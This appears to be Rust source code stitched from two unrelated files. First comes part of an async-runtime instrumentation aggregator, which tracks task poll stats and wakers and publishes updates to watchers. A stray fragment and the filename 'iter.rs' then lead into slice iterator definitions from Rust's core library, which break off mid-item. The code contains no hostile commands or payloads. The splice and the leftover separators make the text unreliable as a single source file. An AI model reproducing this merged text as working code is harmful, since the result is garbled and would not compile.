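/// nested enters merely increment the in-progress counter.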
fn update_on_span_enter(&mut self, timestamp: SystemTime) {
if self.current_polls == 0 {
self.last_poll_started = Some(timestamp);
if self.first_poll.is_none() {
self.first_poll = Some(timestamp);
}
self.polls += 1;
}
self.current_polls += 1;
}
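/// Records a span exit. When the outermost enter unwinds, the elapsed time
/// since the poll started is folded into `busy_time`.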
fn update_on_span_exit(&mut self, timestamp: SystemTime) {
self.current_polls -= 1;
if self.current_polls == 0 {
if let Some(last_poll_started) = self.last_poll_started {
let elapsed = timestamp.duration_since(last_poll_started).unwrap();
self.last_poll_ended = Some(timestamp);
self.busy_time += elapsed;
}
}
}
fn since_last_poll(&self, timestamp: SystemTime) -> Option<Duration> {
self.last_poll_started
.map(|lps| timestamp.duration_since(lps).unwrap())
}
}
impl Default for TaskStats {
fn default() -> Self {
TaskStats {
created_at: None,
dropped_at: None,
wakes: 0,
waker_clones: 0,
waker_drops: 0,
self_wakes: 0,
last_wake: None,
// significant figures should be in the [0-5] range and memory usage
// grows exponentially with a higher sigfig
poll_times_histogram: Histogram::<u64>::new(2).unwrap(),
poll_stats: PollStats::default(),
}
}
}
impl Aggregator {
pub(crate) fn new(
events: mpsc::Receiver<Event>,
rpcs: mpsc::Receiver<Command>,
builder: &crate::Builder,
) -> Self {
Self {
flush_capacity: Arc::new(Flush {
should_flush: Notify::new(),
triggered: AtomicBool::new(false),
}),
rpcs,
publish_interval: builder.publish_interval,
retention: builder.retention,
events,
watchers: Default::default(),
details_watchers: Default::default(),
all_metadata: Default::default(),
new_metadata: Default::default(),
tasks: IdData::default(),
task_stats: IdData::default(),
resources: IdData::default(),
resource_stats: IdData::default(),
async_ops: IdData::default(),
async_op_stats: IdData::default(),
all_poll_ops: Default::default(),
new_poll_ops: Default::default(),
ids: Ids::default(),
recorder: builder
.recording_path
.as_ref()
.map(|path| Recorder::new(path).expect("creating recorder")),
temporality: Temporality::Live,
}
}
pub(crate) fn flush(&self) -> &Arc<Flush> {
&self.flush_capacity
}
pub(crate) async fn run(mut self) {
let mut publish = tokio::time::interval(self.publish_interval);
loop {
let should_send = tokio::select! {
// if the flush interval elapses, flush data to the client
_ = publish.tick() => {
match self.temporality {
Temporality::Live => true,
Temporality::Paused => false,
}
}
// triggered when the event buffer is approaching capacity
_ = self.flush_capacity.should_flush.notified() => {
tracing::debug!("approaching capacity; draining buffer");
false
}
// a new command from a client
cmd = self.rpcs.recv() => {
match cmd {
Some(Command::Instrument(subscription)) => {
self.add_instrument_subscription(subscription);
},
Some(Command::WatchTaskDetail(watch_request)) => {
self.add_task_detail_subscription(watch_request);
},
Some(Command::Pause) => {
self.temporality = Temporality::Paused;
}
Some(Command::Resume) => {
self.temporality = Temporality::Live;
}
None => {
tracing::debug!("rpc channel closed, terminating");
return;
}
};
false
}
};
// drain and aggregate buffered events.
//
// Note: we *don't* want to actually await the call to `recv` --- we
// don't want the aggregator task to be woken on every event,
// because it will then be woken when its own `poll` calls are
// exited. that would result in a busy-loop. instead, we only want
// to be woken when the flush interval has elapsed, or when the
// channel is almost full.
let mut drained = false;
while let Some(event) = self.events.recv().now_or_never() {
match event {
Some(event) => {
// always be recording...
if let Some(ref recorder) = self.recorder {
recorder.record(&event);
}
self.update_state(event);
drained = true;
}
// The channel closed, no more events will be emitted...time
// to stop aggregating.
None => {
tracing::debug!("event channel closed; terminating");
return;
}
};
}
// flush data to clients, if there are any currently subscribed
// watchers and we should send a new update.
if !self.watchers.is_empty() && should_send {
self.publish();
}
self.cleanup_closed();
if drained {
self.flush_capacity.has_flushed();
}
}
}
fn cleanup_closed(&mut self) {
// Drop all closed entities that have completed *and* whose final data has
// already been sent off.
let now = SystemTime::now();
let has_watchers = !self.watchers.is_empty();
self.tasks.drop_closed(
&mut self.task_stats,
now,
self.retention,
has_watchers,
&mut self.ids,
);
self.resources.drop_closed(
&mut self.resource_stats,
now,
self.retention,
has_watchers,
&mut self.ids,
);
self.async_ops.drop_closed(
&mut self.async_op_stats,
now,
self.retention,
has_watchers,
&mut self.ids,
);
}
/// Add the task subscription to the watchers after sending the first update
fn add_instrument_subscription(&mut self, subscription: Watch<proto::instrument::Update>) {
tracing::debug!("new instrument subscription");
let now = SystemTime::now();
// Send the initial state --- if this fails, the subscription is already dead
let update = &proto::instrument::Update {
task_update: Some(proto::tasks::TaskUpdate {
new_tasks: self
.tasks
.all()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.task_stats.as_proto(Include::All),
}),
resource_update: Some(proto::resources::ResourceUpdate {
new_resources: self
.resources
.all()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.resource_stats.as_proto(Include::All),
new_poll_ops: (*self.all_poll_ops).clone(),
}),
async_op_update: Some(proto::async_ops::AsyncOpUpdate {
new_async_ops: self
.async_ops
.all()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.async_op_stats.as_proto(Include::All),
}),
now: Some(now.into()),
new_metadata: Some(proto::RegisterMetadata {
metadata: (*self.all_metadata).clone(),
}),
};
if subscription.update(update) {
self.watchers.push(subscription)
}
}
/// Add the task details subscription to the watchers after sending the first update,
/// if the task is found.
fn add_task_detail_subscription(
&mut self,
watch_request: WatchRequest<proto::tasks::TaskDetails>,
) {
let WatchRequest {
id,
stream_sender,
buffer,
} = watch_request;
tracing::debug!(id = ?id, "new task details subscription");
if let Some(stats) = self.task_stats.get(&id) {
let (tx, rx) = mpsc::channel(buffer);
let subscription = Watch(tx);
let now = SystemTime::now();
// Send back the stream receiver.
// Then send the initial state --- if this fails, the subscription is already dead.
if stream_sender.send(rx).is_ok()
&& subscription.update(&proto::tasks::TaskDetails {
task_id: Some(id.into()),
now: Some(now.into()),
poll_times_histogram: serialize_histogram(&stats.poll_times_histogram).ok(),
})
{
self.details_watchers
.entry(id)
.or_insert_with(Vec::new)
.push(subscription);
}
}
// If the task is not found, drop `stream_sender`, which will result in a not-found error
}
/// Publish the current state to all active watchers.
///
/// This drops any watchers which have closed the RPC, or whose update
/// channel has filled up.
fn publish(&mut self) {
let new_metadata = if !self.new_metadata.is_empty() {
Some(proto::RegisterMetadata {
metadata: std::mem::take(&mut self.new_metadata),
})
} else {
None
};
let new_poll_ops = std::mem::take(&mut self.new_poll_ops);
let now = SystemTime::now();
let update = proto::instrument::Update {
now: Some(now.into()),
new_metadata,
task_update: Some(proto::tasks::TaskUpdate {
new_tasks: self
.tasks
.since_last_update()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.task_stats.as_proto(Include::UpdatedOnly),
}),
resource_update: Some(proto::resources::ResourceUpdate {
new_resources: self
.resources
.since_last_update()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.resource_stats.as_proto(Include::UpdatedOnly),
new_poll_ops,
}),
async_op_update: Some(proto::async_ops::AsyncOpUpdate {
new_async_ops: self
.async_ops
.since_last_update()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.async_op_stats.as_proto(Include::UpdatedOnly),
}),
};
self.watchers
.retain_and_shrink(|watch: &Watch<proto::instrument::Update>| watch.update(&update));
let stats = &self.task_stats;
// Assuming there are far fewer task details subscribers than there are
// stats updates, iterate over `details_watchers` and compact the map.
self.details_watchers.retain_and_shrink(|&id, watchers| {
if let Some(task_stats) = stats.get(&id) {
let details = proto::tasks::TaskDetails {
task_id: Some(id.into()),
now: Some(now.into()),
poll_times_histogram: serialize_histogram(&task_stats.poll_times_histogram)
.ok(),
};
watchers.retain(|watch| watch.update(&details));
!watchers.is_empty()
} else {
false
}
});
}
/// Update the current state with data from a single event.
fn update_state(&mut self, event: Event) {
// do state update
match event {
Event::Metadata(meta) => {
self.all_metadata.push(meta.into());
self.new_metadata.push(meta.into());
}
Event::Spawn {
id,
metadata,
at,
fields,
location,
} => {
let id = self.ids.id_for(id);
self.tasks.insert(
id,
Task {
id,
metadata,
fields,
location,
// TODO: parents
},
);
self.task_stats.insert(
id,
TaskStats {
created_at: Some(at),
..Default::default()
},
);
}
Event::Enter { id, at } => {
let id = self.ids.id_for(id);
if let Some(mut task_stats) = self.task_stats.update(&id) {
task_stats.poll_stats.update_on_span_enter(at);
}
if let Some(mut async_op_stats) = self.async_op_stats.update(&id) {
async_op_stats.poll_stats.update_on_span_enter(at);
}
}
Event::Exit { id, at } => {
let id = self.ids.id_for(id);
if let Some(mut task_stats) = self.task_stats.update(&id) {
task_stats.poll_stats.update_on_span_exit(at);
if let Some(since_last_poll) = task_stats.poll_stats.since_last_poll(at) {
task_stats
.poll_times_histogram
.record(since_last_poll.as_nanos().try_into().unwrap_or(u64::MAX))
.unwrap();
}
}
if let Some(mut async_op_stats) = self.async_op_stats.update(&id) {
async_op_stats.poll_stats.update_on_span_exit(at);
}
}
Event::Close { id, at } => {
let id = self.ids.id_for(id);
if let Some(mut task_stats) = self.task_stats.update(&id) {
task_stats.dropped_at = Some(at);
}
if let Some(mut resource_stats) = self.resource_stats.update(&id) {
resource_stats.dropped_at = Some(at);
}
if let Some(mut async_op_stats) = self.async_op_stats.update(&id) {
async_op_stats.dropped_at = Some(at);
}
}
Event::Waker { id, op, at } => {
let id = self.ids.id_for(id);
// It's possible for wakers to exist long after a task has
// finished. We don't want those cases to create a "new"
// task that isn't closed, just to insert some waker stats.
//
// It may be useful to eventually be able to report about
// "wasted" waker ops, but we'll leave that for another time.
if let Some(mut task_stats) = self.task_stats.update(&id) {
match op {
WakeOp::Wake { self_wake } | WakeOp::WakeByRef { self_wake } => {
task_stats.wakes += 1;
task_stats.last_wake = Some(at);
// If the task has woken itself, increment the
// self-wake count.
if self_wake {
task_stats.self_wakes += 1;
}
// Note: `Waker::wake` does *not* call the `drop`
// implementation, so waking by value doesn't
// trigger a drop event. so, count this as a `drop`
// to ensure the task's number of wakers can be
// calculated as `clones` - `drops`.
//
// see
// https://github.com/rust-lang/rust/blob/673d0db5e393e9c64897005b470bfeb6d5aec61b/library/core/src/task/wake.rs#L211-L212
if let WakeOp::Wake { .. } = op {
task_stats.waker_drops += 1;
}
}
WakeOp::Clone => {
task_stats.waker_clones += 1;
}
WakeOp::Drop => {
task_stats.waker_drops += 1;
}
}
}
}
Event::Resource {
at,
id,
metadata,
kind,
concrete_type,
location,
..
} => {
let id = self.ids.id_for(id);
self.resources.insert(
id,
Resource {
id,
kind,
metadata,
concrete_type,
location,
},
);
self.resource_stats.insert(
id,
ResourceStats {
created_at: Some(at),
..Default::default()
},
);
}
Event::PollOp {
metadata,
at,
resource_id,
op_name,
async_op_id,
task_id,
is_ready,
} => {
let async_op_id = self.ids.id_for(async_op_id);
let resource_id = self.ids.id_for(resource_id);
let task_id = self.ids.id_for(task_id);
let mut async_op_stats = self.async_op_stats.update_or_default(async_op_id);
async_op_stats.poll_stats.polls += 1;
async_op_stats.task_id.get_or_insert(task_id);
async_op_stats.resource_id.get_or_insert(resource_id);
if !is_ready && async_op_stats.poll_stats.first_poll.is_none() {
async_op_stats.poll_stats.first_poll = Some(at);
}
let poll_op = proto::resources::PollOp {
metadata: Some(metadata.into()),
resource_id: Some(resource_id.into()),
name: op_name,
task_id: Some(task_id.into()),
async_op_id: Some(async_op_id.into()),
is_ready,
};
self.all_poll_ops.push(poll_op.clone());
self.new_poll_ops.push(poll_op);
}
Event::StateUpdate {
resource_id,
update,
..
} => {
let resource_id = self.ids.id_for(resource_id);
if let Some(mut stats) = self.resource_stats.update(&resource_id) {
let field_name = match update.field.name.clone() {
Some(name) => name,
None => {
tracing::warn!(?update.field, "field missing name, skipping...");
return;
}
};
let upd_key = FieldKey {
resource_id,
field_name,
};
match stats.attributes.entry(upd_key) {
Entry::Occupied(ref mut attr) => {
update_attribute(attr.get_mut(), update);
}
Entry::Vacant(attr) => {
attr.insert(update.into());
}
}
}
}
Event::AsyncResourceOp {
at,
id,
source,
metadata,
..
} => {
let id = self.ids.id_for(id);
self.async_ops.insert(
id,
AsyncOp {
id,
metadata,
source,
},
);
self.async_op_stats.insert(
id,
AsyncOpStats {
created_at: Some(at),
..Default::default()
},
);
}
}
}
}
// === impl Flush ===
impl Flush {
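/// Notifies the aggregator that the event buffer is approaching capacity
/// and should be drained. The `triggered` flag ensures that at most one
/// notification is outstanding until `has_flushed` resets it.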
pub(crate) fn trigger(&self) {
if self
.triggered
.compare_exchange(false, true, AcqRel, Acquire)
.is_ok()
{
self.should_flush.notify_one();
} else {
// someone else already did it, that's fine...
}
}
/// Indicates that the buffer has been successfully flushed.
fn has_flushed(&self) {
let _ = self
.triggered
.compare_exchange(true, false, AcqRel, Acquire);
}
}
impl<T: Clone> Watch<T> {
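/// Attempts to send `update` to this watcher without blocking.
///
/// Returns `false` if the channel is full or closed, signaling to the
/// caller that the watcher should be dropped.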
fn update(&self, update: &T) -> bool {
if let Ok(reserve) = self.0.try_reserve() {
reserve.send(Ok(update.clone()));
true
} else {
false
}
}
}
impl ToProto for PollStats {
type Output = proto::PollStats;
fn to_proto(&self) -> Self::Output {
proto::PollStats {
polls: self.polls,
first_poll: self.first_poll.map(Into::into),
last_poll_started: self.last_poll_started.map(Into::into),
last_poll_ended: self.last_poll_ended.map(Into::into),
busy_time: Some(self.busy_time.into()),
}
}
}
impl ToProto for Task {
type Output = proto::tasks::Task;
fn to_proto(&self) -> Self::Output {
proto::tasks::Task {
id: Some(self.id.into()),
// TODO: more kinds of tasks...
kind: proto::tasks::task::Kind::Spawn as i32,
metadata: Some(self.metadata.into()),
parents: Vec::new(), // TODO: implement parents nicely
fields: self.fields.clone(),
location: self.location.clone(),
}
}
}
impl ToProto for TaskStats {
type Output = proto::tasks::Stats;
fn to_proto(&self) -> Self::Output {
proto::tasks::Stats {
poll_stats: Some(self.poll_stats.to_proto()),
created_at: self.created_at.map(Into::into),
dropped_at: self.dropped_at.map(Into::into),
wakes: self.wakes,
waker_clones: self.waker_clones,
self_wakes: self.self_wakes,
waker_drops: self.waker_drops,
last_wake: self.last_wake.map(Into::into),
}
}
}
impl ToProto for Resource {
type Output = proto::resources::Resource;
fn to_proto(&self) -> Self::Output {
proto::resources::Resource {
id: Some(self.id.into()),
kind: Some(self.kind.clone()),
metadata: Some(self.metadata.into()),
concrete_type: self.concrete_type.clone(),
location: self.location.clone(),
}
}
}
impl ToProto for ResourceStats {
type Output = proto::resources::Stats;
fn to_proto(&self) -> Self::Output {
let attributes = self.attributes.values().cloned().collect();
proto::resources::Stats {
created_at: self.created_at.map(Into::into),
dropped_at: self.dropped_at.map(Into::into),
attributes,
}
}
}
impl ToProto for AsyncOp {
type Output = proto::async_ops::AsyncOp;
fn to_proto(&self) -> Self::Output {
proto::async_ops::AsyncOp {
id: Some(self.id.into()),
metadata: Some(self.metadata.into()),
source: self.source.clone(),
}
}
}
impl ToProto for AsyncOpStats {
type Output = proto::async_ops::Stats;
fn to_proto(&self) -> Self::Output {
proto::async_ops::Stats {
poll_stats: Some(self.poll_stats.to_proto()),
created_at: self.created_at.map(Into::into),
dropped_at: self.dropped_at.map(Into::into),
resource_id: self.resource_id.map(Into::into),
task_id: self.task_id.map(Into::into),
}
}
}
impl From<AttributeUpdate> for Attribute {
fn from(upd: AttributeUpdate) -> Self {
Attribute {
field: Some(upd.field),
unit: upd.unit,
}
}
}
// === impl Ids ===
impl Ids {
fn id_for(&mut self, span_id: span::Id) -> Id {
match self.id_mappings.entry(span_id) {
Entry::Occupied(entry) => *entry.get(),
Entry::Vacant(entry) => {
let task_id = self.next;
entry.insert(task_id);
self.next = self.next.wrapping_add(1);
task_id
}
}
}
#[inline]
fn remove_all(&mut self, ids: &HashSet<Id>) {
self.id_mappings.retain(|_, id| !ids.contains(id));
}
}
fn serialize_histogram(histogram: &Histogram<u64>) -> Result<Vec<u8>, V2SerializeError> {
let mut serializer = V2Serializer::new();
let mut buf = Vec::new();
serializer.serialize(histogram, &mut buf)?;
Ok(buf)
}
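/// Merges an `AttributeUpdate` into an existing `Attribute` in place: numeric
/// (`u64`/`i64`) values are combined according to the update's
/// `AttributeUpdateOp` (`Add`, `Sub`, or `Override`), while bool, string, and
/// debug values are overwritten; mismatched value kinds are logged and ignored.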
fn update_attribute(attribute: &mut Attribute, update: AttributeUpdate) {
use proto::field::Value::*;
let attribute_val = attribute.field.as_mut().and_then(|a| a.value.as_mut());
let update_val = update.field.value;
let update_name = update.field.name;
match (attribute_val, update_val) {
(Some(BoolVal(v)), Some(BoolVal(upd))) => *v = upd,
(Some(StrVal(v)), Some(StrVal(upd))) => *v = upd,
(Some(DebugVal(v)), Some(DebugVal(upd))) => *v = upd,
(Some(U64Val(v)), Some(U64Val(upd))) => match update.op {
Some(AttributeUpdateOp::Add) => *v += upd,
Some(AttributeUpdateOp::Sub) => *v -= upd,
Some(AttributeUpdateOp::Override) => *v = upd,
None => tracing::warn!(
"numeric attribute update {:?} needs to have an op field",
update_name
),
},
(Some(I64Val(v)), Some(I64Val(upd))) => match update.op {
Some(AttributeUpdateOp::Add) => *v += upd,
Some(AttributeUpdateOp::Sub) => *v -= upd,
Some(AttributeUpdateOp::Override) => *v = upd,
None => tracing::warn!(
"numeric attribute update {:?} needs to have an op field",
update_name
),
},
(val, update) => {
tracing::warn!(
"attribute {:?} cannot be updated by update {:?}",
val,
update
);
}
}
}
| {
self.dropped_at
} |
iter.rs | //! Definitions of a bunch of iterators for `[T]`.
#[macro_use] // import iterator! and forward_iterator!
mod macros;
use crate::cmp;
use crate::cmp::Ordering;
use crate::fmt;
use crate::intrinsics::{assume, exact_div, unchecked_sub};
use crate::iter::{FusedIterator, TrustedLen, TrustedRandomAccess};
use crate::marker::{PhantomData, Send, Sized, Sync};
use crate::mem;
use crate::ptr::NonNull;
use super::{from_raw_parts, from_raw_parts_mut};
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> IntoIterator for &'a [T] {
type Item = &'a T;
type IntoIter = Iter<'a, T>;
fn into_iter(self) -> Iter<'a, T> {
self.iter()
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> IntoIterator for &'a mut [T] {
type Item = &'a mut T;
type IntoIter = IterMut<'a, T>;
fn into_iter(self) -> IterMut<'a, T> {
self.iter_mut()
}
}
// Macro helper functions
#[inline(always)]
fn size_from_ptr<T>(_: *const T) -> usize {
mem::size_of::<T>()
}
/// Immutable slice iterator
///
/// This struct is created by the [`iter`] method on [slices].
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has the `iter` method to get the `Iter` struct (`&[usize]` here):
/// let slice = &[1, 2, 3];
///
/// // Then, we iterate over it:
/// for element in slice.iter() {
/// println!("{}", element);
/// }
/// ```
///
/// [`iter`]: ../../std/primitive.slice.html#method.iter
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Iter<'a, T: 'a> {
ptr: NonNull<T>,
end: *const T, // If T is a ZST, this is actually ptr+len. This encoding is picked so that
// ptr == end is a quick test for the Iterator being empty, that works
// for both ZST and non-ZST.
_marker: PhantomData<&'a T>,
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug> fmt::Debug for Iter<'_, T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_tuple("Iter").field(&self.as_slice()).finish()
}
}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Sync> Sync for Iter<'_, T> {}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Sync> Send for Iter<'_, T> {}
impl<'a, T> Iter<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T]) -> Self {
let ptr = slice.as_ptr();
// SAFETY: Similar to `IterMut::new`.
unsafe {
assume(!ptr.is_null());
let end = if mem::size_of::<T>() == 0 {
(ptr as *const u8).wrapping_add(slice.len()) as *const T
} else {
ptr.add(slice.len())
};
Self { ptr: NonNull::new_unchecked(ptr as *mut T), end, _marker: PhantomData }
}
}
/// Views the underlying data as a subslice of the original data.
///
/// This has the same lifetime as the original slice, and so the
/// iterator can continue to be used while this exists.
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has the `iter` method to get the `Iter`
/// // struct (`&[usize]` here):
/// let slice = &[1, 2, 3];
///
/// // Then, we get the iterator:
/// let mut iter = slice.iter();
/// // So if we print what the `as_slice` method returns here, we have "[1, 2, 3]":
/// println!("{:?}", iter.as_slice());
///
/// // Next, we move to the second element of the slice:
/// iter.next();
/// // Now `as_slice` returns "[2, 3]":
/// println!("{:?}", iter.as_slice());
/// ```
#[stable(feature = "iter_to_slice", since = "1.4.0")]
pub fn as_slice(&self) -> &'a [T] {
self.make_slice()
}
}
iterator! {struct Iter -> *const T, &'a T, const, {/* no mut */}, {
fn is_sorted_by<F>(self, mut compare: F) -> bool
where
Self: Sized,
F: FnMut(&Self::Item, &Self::Item) -> Option<Ordering>,
{
self.as_slice().windows(2).all(|w| {
compare(&&w[0], &&w[1]).map(|o| o != Ordering::Greater).unwrap_or(false)
})
}
}}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Clone for Iter<'_, T> {
fn clone(&self) -> Self {
Iter { ptr: self.ptr, end: self.end, _marker: self._marker }
}
}
#[stable(feature = "slice_iter_as_ref", since = "1.13.0")]
impl<T> AsRef<[T]> for Iter<'_, T> {
fn as_ref(&self) -> &[T] {
self.as_slice()
}
}
/// Mutable slice iterator.
///
/// This struct is created by the [`iter_mut`] method on [slices].
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has the `iter_mut` method to get the `IterMut`
/// // struct (`&[usize]` here):
/// let mut slice = &mut [1, 2, 3];
///
/// // Then, we iterate over it and increment each element value:
/// for element in slice.iter_mut() {
/// *element += 1;
/// }
///
/// // We now have "[2, 3, 4]":
/// println!("{:?}", slice);
/// ```
///
/// [`iter_mut`]: ../../std/primitive.slice.html#method.iter_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct IterMut<'a, T: 'a> {
ptr: NonNull<T>,
end: *mut T, // If T is a ZST, this is actually ptr+len. This encoding is picked so that
// ptr == end is a quick test for the Iterator being empty, that works
// for both ZST and non-ZST.
_marker: PhantomData<&'a mut T>,
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug> fmt::Debug for IterMut<'_, T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_tuple("IterMut").field(&self.make_slice()).finish()
}
}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Sync> Sync for IterMut<'_, T> {}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Send> Send for IterMut<'_, T> {}
impl<'a, T> IterMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T]) -> Self {
let ptr = slice.as_mut_ptr();
// SAFETY: There are several things here:
//
// `ptr` has been obtained by `slice.as_mut_ptr()` where `slice` is a valid
// reference, thus it is non-null and safe to use and pass to
// `NonNull::new_unchecked`.
//
// Adding `slice.len()` to the starting pointer gives a pointer
// at the end of `slice`. `end` will never be dereferenced, only checked
// for direct pointer equality with `ptr` to check if the iterator is
// done.
//
// In the case of a ZST, the end pointer is just the start pointer plus
// the length, which also allows for the fast `ptr == end` check.
//
// See the `next_unchecked!` and `is_empty!` macros as well as the
// `post_inc_start` method for more information.
unsafe {
assume(!ptr.is_null());
let end = if mem::size_of::<T>() == 0 {
(ptr as *mut u8).wrapping_add(slice.len()) as *mut T
} else {
ptr.add(slice.len())
};
Self { ptr: NonNull::new_unchecked(ptr), end, _marker: PhantomData }
}
}
/// Views the underlying data as a subslice of the original data.
///
/// To avoid creating `&mut` references that alias, this is forced
/// to consume the iterator.
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has the `iter_mut` method to get the `IterMut`
/// // struct (`&[usize]` here):
/// let mut slice = &mut [1, 2, 3];
///
/// {
/// // Then, we get the iterator:
/// let mut iter = slice.iter_mut();
/// // We move to the next element:
/// iter.next();
/// // So if we print what the `into_slice` method returns here, we have "[2, 3]":
/// println!("{:?}", iter.into_slice());
/// }
///
/// // Now let's modify a value of the slice:
/// {
/// // First we get back the iterator:
/// let mut iter = slice.iter_mut();
/// // We change the value of the first element of the slice returned by the `next` method:
/// *iter.next().unwrap() += 1;
/// }
/// // Now slice is "[2, 2, 3]":
/// println!("{:?}", slice);
/// ```
#[stable(feature = "iter_to_slice", since = "1.4.0")]
pub fn into_slice(self) -> &'a mut [T] {
// SAFETY: the iterator was created from a mutable slice with pointer
// `self.ptr` and length `len!(self)`. This guarantees that all the prerequisites
// for `from_raw_parts_mut` are fulfilled.
unsafe { from_raw_parts_mut(self.ptr.as_ptr(), len!(self)) }
}
/// Views the underlying data as a subslice of the original data.
///
/// To avoid creating `&mut [T]` references that alias, the returned slice
/// borrows its lifetime from the iterator the method is applied on.
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// # #![feature(slice_iter_mut_as_slice)]
/// let mut slice: &mut [usize] = &mut [1, 2, 3];
///
/// // First, we get the iterator:
/// let mut iter = slice.iter_mut();
/// // So if we check what the `as_slice` method returns here, we have "[1, 2, 3]":
/// assert_eq!(iter.as_slice(), &[1, 2, 3]);
///
/// // Next, we move to the second element of the slice:
/// iter.next();
/// // Now `as_slice` returns "[2, 3]":
/// assert_eq!(iter.as_slice(), &[2, 3]);
/// ```
#[unstable(feature = "slice_iter_mut_as_slice", reason = "recently added", issue = "58957")]
pub fn as_slice(&self) -> &[T] {
self.make_slice()
}
}
iterator! {struct IterMut -> *mut T, &'a mut T, mut, {mut}, {}}
/// An internal abstraction over the splitting iterators, so that
/// splitn, splitn_mut etc can be implemented once.
#[doc(hidden)]
pub(super) trait SplitIter: DoubleEndedIterator {
/// Marks the underlying iterator as complete, extracting the remaining
/// portion of the slice.
fn finish(&mut self) -> Option<Self::Item>;
}
/// An iterator over subslices separated by elements that match a predicate
/// function.
///
/// This struct is created by the [`split`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [10, 40, 33, 20];
/// let mut iter = slice.split(|num| num % 3 == 0);
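/// // For illustration, the element matching the predicate (33) is not
/// // contained in the yielded subslices:
/// assert_eq!(iter.next(), Some(&[10, 40][..]));
/// assert_eq!(iter.next(), Some(&[20][..]));
/// assert_eq!(iter.next(), None);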
/// ```
///
/// [`split`]: ../../std/primitive.slice.html#method.split
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Split<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> Split<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for Split<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("Split").field("v", &self.v).field("finished", &self.finished).finish()
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rust1", since = "1.0.0")]
impl<T, P> Clone for Split<'_, T, P>
where
P: Clone + FnMut(&T) -> bool,
{
fn clone(&self) -> Self {
Split { v: self.v, pred: self.pred.clone(), finished: self.finished }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> Iterator for Split<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
match self.v.iter().position(|x| (self.pred)(x)) {
None => self.finish(),
Some(idx) => {
let ret = Some(&self.v[..idx]);
self.v = &self.v[idx + 1..];
ret
}
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished { (0, Some(0)) } else { (1, Some(self.v.len() + 1)) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> DoubleEndedIterator for Split<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
match self.v.iter().rposition(|x| (self.pred)(x)) {
None => self.finish(),
Some(idx) => {
let ret = Some(&self.v[idx + 1..]);
self.v = &self.v[..idx];
ret
}
}
}
}
impl<'a, T, P> SplitIter for Split<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a [T]> {
if self.finished {
None
} else {
self.finished = true;
Some(self.v)
}
}
}
#[stable(feature = "fused", since = "1.26.0")]
impl<T, P> FusedIterator for Split<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over subslices separated by elements that match a predicate
/// function. Unlike `Split`, it contains the matched part as a terminator
/// of the subslice.
///
/// This struct is created by the [`split_inclusive`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(split_inclusive)]
///
/// let slice = [10, 40, 33, 20];
/// let mut iter = slice.split_inclusive(|num| num % 3 == 0);
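/// // Unlike `split`, the matched element (33) terminates the first subslice:
/// assert_eq!(iter.next(), Some(&[10, 40, 33][..]));
/// assert_eq!(iter.next(), Some(&[20][..]));
/// assert_eq!(iter.next(), None);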
/// ```
///
/// [`split_inclusive`]: ../../std/primitive.slice.html#method.split_inclusive
/// [slices]: ../../std/primitive.slice.html
#[unstable(feature = "split_inclusive", issue = "72360")]
pub struct SplitInclusive<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitInclusive<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
